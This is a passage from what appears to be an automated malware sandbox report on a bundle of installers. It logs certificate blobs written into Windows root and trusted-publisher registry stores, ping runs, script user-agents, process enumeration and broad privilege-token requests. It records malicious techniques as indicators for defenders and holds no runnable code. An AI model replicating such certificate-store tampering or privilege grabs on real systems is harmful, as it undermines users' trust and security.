56e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce7f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007e000000010000000800000000c0032f2df8d60103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b812000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 Cleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d03000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e000000010000000800000000c0032f2df8d6010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68 Cleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Cleaner_Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81 Cleaner.exe -
Runs ping.exe 1 TTPs 6 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 6688 PING.EXE 5980 PING.EXE 5816 PING.EXE 7148 PING.EXE 1604 PING.EXE 2660 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 41 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 80 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe4790483.exeWerFault.exeWerFault.exeWerFault.exeSetup.exeWerFault.exemsedge.exeWerFault.exesvchost.exemsedge.exemsedge.exeWerFault.exeImpedire.exe.comWerFault.exeWerFault.exeultramediaburner.tmp2218437.exeConhost.execonhost.exeConhost.exe8536432.exeJoculoqoqu.exeDllHost.exepid process 4936 powershell.exe 4936 powershell.exe 4936 powershell.exe 5680 4790483.exe 5680 4790483.exe 4708 WerFault.exe 4708 WerFault.exe 6104 WerFault.exe 6104 WerFault.exe 5956 WerFault.exe 5956 WerFault.exe 3640 Setup.exe 3640 Setup.exe 3640 Setup.exe 3640 Setup.exe 1600 WerFault.exe 1600 WerFault.exe 476 msedge.exe 476 msedge.exe 3312 WerFault.exe 3312 WerFault.exe 6000 svchost.exe 6000 svchost.exe 6028 msedge.exe 6028 msedge.exe 5332 msedge.exe 5332 msedge.exe 5220 WerFault.exe 5220 WerFault.exe 5524 Impedire.exe.com 5524 Impedire.exe.com 6944 WerFault.exe 6944 WerFault.exe 7060 WerFault.exe 7060 WerFault.exe 4924 ultramediaburner.tmp 4924 ultramediaburner.tmp 5712 2218437.exe 5712 2218437.exe 5972 Conhost.exe 5972 Conhost.exe 6896 conhost.exe 6896 conhost.exe 6516 Conhost.exe 6516 Conhost.exe 1248 8536432.exe 1248 8536432.exe 6388 Joculoqoqu.exe 7092 DllHost.exe 7092 DllHost.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe 6388 Joculoqoqu.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3212 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
bWPeeD60Vsu4ib9lxUilR8TX.exe83D6.exepid process 456 bWPeeD60Vsu4ib9lxUilR8TX.exe 6380 83D6.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Thu21a1ef054cac78a.exeThu21568b0ab8.exepowershell.exeThu219d5fe8cf316.exeThu2156de5489c19.exeImpedire.exe.com4790483.exe2.exeUltraMediaBurner.exeConhost.exeSetup.exeBearVpn 3.exe2218437.exe46807GHF____.exetaskkill.exeConhost.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeAssignPrimaryTokenPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeLockMemoryPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeIncreaseQuotaPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeMachineAccountPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeTcbPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeSecurityPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeTakeOwnershipPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeLoadDriverPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeSystemProfilePrivilege 1404 Thu21a1ef054cac78a.exe Token: SeSystemtimePrivilege 1404 Thu21a1ef054cac78a.exe Token: SeProfSingleProcessPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeIncBasePriorityPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeCreatePagefilePrivilege 1404 Thu21a1ef054cac78a.exe Token: SeCreatePermanentPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeBackupPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeRestorePrivilege 1404 Thu21a1ef054cac78a.exe Token: SeShutdownPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeAuditPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeSystemEnvironmentPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeChangeNotifyPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeRemoteShutdownPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeUndockPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeSyncAgentPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeEnableDelegationPrivilege 1404 Thu21a1ef054cac78a.exe Token: SeManageVolumePrivilege 1404 Thu21a1ef054cac78a.exe Token: SeImpersonatePrivilege 1404 Thu21a1ef054cac78a.exe Token: SeCreateGlobalPrivilege 1404 Thu21a1ef054cac78a.exe Token: 31 1404 Thu21a1ef054cac78a.exe Token: 32 1404 Thu21a1ef054cac78a.exe Token: 33 1404 Thu21a1ef054cac78a.exe Token: 34 1404 Thu21a1ef054cac78a.exe Token: 35 1404 Thu21a1ef054cac78a.exe Token: SeDebugPrivilege 2440 Thu21568b0ab8.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeDebugPrivilege 1016 Thu219d5fe8cf316.exe Token: SeDebugPrivilege 812 Thu2156de5489c19.exe Token: SeDebugPrivilege 5524 Impedire.exe.com Token: SeRestorePrivilege 5680 4790483.exe Token: SeBackupPrivilege 5680 4790483.exe Token: SeDebugPrivilege 4116 2.exe Token: SeDebugPrivilege 6076 UltraMediaBurner.exe Token: SeDebugPrivilege 3976 Conhost.exe Token: SeDebugPrivilege 3640 Setup.exe Token: SeDebugPrivilege 5904 BearVpn 3.exe Token: SeDebugPrivilege 5712 2218437.exe Token: SeDebugPrivilege 5296 46807GHF____.exe Token: SeDebugPrivilege 1680 taskkill.exe Token: SeDebugPrivilege 6516 Conhost.exe Token: SeDebugPrivilege 6920 taskkill.exe Token: SeIncreaseQuotaPrivilege 4936 powershell.exe Token: SeSecurityPrivilege 4936 powershell.exe Token: SeTakeOwnershipPrivilege 4936 powershell.exe Token: SeLoadDriverPrivilege 4936 powershell.exe Token: SeSystemProfilePrivilege 4936 powershell.exe Token: SeSystemtimePrivilege 4936 powershell.exe Token: SeProfSingleProcessPrivilege 4936 powershell.exe Token: SeIncBasePriorityPrivilege 4936 powershell.exe Token: SeCreatePagefilePrivilege 4936 powershell.exe Token: SeBackupPrivilege 4936 powershell.exe Token: SeRestorePrivilege 4936 powershell.exe Token: SeShutdownPrivilege 4936 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Thu21b93295136197.tmpstats.tmpAdorarti.exe.comsvchost.exeAdorarti.exe.commsedge.exeWerFault.exeultramediaburner.tmpinstaller.exeIBInstaller_74449.tmpsvrwebui.exeWerFault.exepid process 2492 Thu21b93295136197.tmp 5716 stats.tmp 5896 Adorarti.exe.com 5896 Adorarti.exe.com 5896 Adorarti.exe.com 6000 svchost.exe 4232 Adorarti.exe.com 4232 Adorarti.exe.com 4232 Adorarti.exe.com 5332 msedge.exe 6544 WerFault.exe 6544 WerFault.exe 6544 WerFault.exe 4924 ultramediaburner.tmp 1096 installer.exe 1408 IBInstaller_74449.tmp 1760 svrwebui.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 